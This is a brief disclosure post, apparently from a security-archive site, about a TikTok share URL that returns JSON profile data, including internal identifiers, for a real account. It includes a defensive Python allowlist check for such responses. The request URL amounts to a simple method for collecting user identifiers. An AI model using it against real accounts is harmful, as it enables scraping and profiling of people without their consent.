Vulnerability disclosure of Tik Tok user information

2020.11.30
Majed (SA)
Risk: Low
Local: No
Remote: Yes
CVE:
CWE: N/A

#####################################################
# Exploit : disclosure of Tik Tok user information
# 30/11/2020
# Category : Web Application Bugs
# Tested on: windows 10
#####################################################
# Demo:
# https://www.tiktok.com/node/share/user/@ae

{"statusCode":0,"statusMsg":"","userInfo":{"user":{"id":"10786675","shortId":"0","uniqueId":"ae","nickname":"ae","avatarLarger":"https://sf-tk-sg.ibytedtos.com/obj/tiktok-obj/1613746256880653","avatarMedium":"https://sf-tk-sg.ibytedtos.com/obj/tiktok-obj/1613746256880653","avatarThumb":"https://sf-tk-sg.ibytedtos.com/obj/tiktok-obj/1613746256880653","signature":"","createTime":1443336057,"verified":false,"secUid":"MS4wLjABAAAAOx6p2WtV-nLHVQD7FOTdYBAvaqjQhij27VLaqRKou9Q","ftc":false,"relation":0,"openFavorite":false,"commentSetting":0,"duetSetting":0,"stitchSetting":0,"privateAccount":false,"secret":false},"stats":{"followerCount":443,"followingCount":0,"heart":0,"heartCount":0,"videoCount":0,"diggCount":0},"shareMeta":{"title":"ae on TikTok","desc":"@ae 443 Followers, 0 Following, 0 Likes - Watch awesome short videos created by ae"}},"predictedLanguage":null,"metaParams":{"title":"ae (@ae) TikTok | Watch ae's Newest TikTok Videos","keywords":"ae,ae,TikTok, ティックトック, tik tok, tick tock, tic tok, tic toc, tictok, тик ток, ticktock","description":"ae (@ae) on TikTok | 0 Likes. 443 Fans. Watch the latest video from ae (@ae).","canonicalHref":"https://www.tiktok.com/@ae","robotsContent":"index, follow","applicableDevice":"pc, mobile"},"itemList":[],"descVideo":{}}
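As an added example (not part of the original advisory and not TikTok's code), the following Python check compares a response like the one in the demo against an allowlist of fields a public profile page is expected to show, and reports every other field under `userInfo`. The allowlist `PUBLIC_FIELDS` and the helper names are assumptions made for illustration; the sample body is abridged from the response above.

```python
import json

# Abridged copy of the response body shown in the demo above.
SAMPLE = '''{"statusCode":0,"userInfo":{"user":{"id":"10786675","uniqueId":"ae",
"nickname":"ae","signature":"","createTime":1443336057,"verified":false,
"secUid":"MS4wLjABAAAAOx6p2WtV-nLHVQD7FOTdYBAvaqjQhij27VLaqRKou9Q",
"openFavorite":false,"commentSetting":0,"privateAccount":false,"secret":false},
"stats":{"followerCount":443,"followingCount":0,"heartCount":0,"videoCount":0}}}'''

# Assumption: the fields a rendered public profile needs. Adjust this set to
# the API contract under review; it does not come from the advisory.
PUBLIC_FIELDS = {
    "user.uniqueId", "user.nickname", "user.signature", "user.verified",
    "stats.followerCount", "stats.followingCount",
    "stats.heartCount", "stats.videoCount",
}


def leaf_paths(node, prefix=""):
    """Yield (dotted_path, value) for every leaf of a nested JSON object."""
    if isinstance(node, dict):
        for key, value in node.items():
            yield from leaf_paths(value, f"{prefix}.{key}" if prefix else key)
    else:
        # Scalars and lists are treated as leaves.
        yield prefix, node


def unexpected_fields(body, allowed=PUBLIC_FIELDS):
    """Return the sorted userInfo field paths that are not on the allowlist."""
    info = json.loads(body).get("userInfo", {})
    return sorted(path for path, _ in leaf_paths(info) if path not in allowed)


if __name__ == "__main__":
    for path in unexpected_fields(SAMPLE):
        print("not on allowlist:", path)
```

Run as a regression test against an endpoint's responses, a non-empty result flags fields that should be dropped from the serializer or put behind authentication.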

References:

https://twitter.com/Mm4Xm


Copyright 2021, cxsecurity.com

 
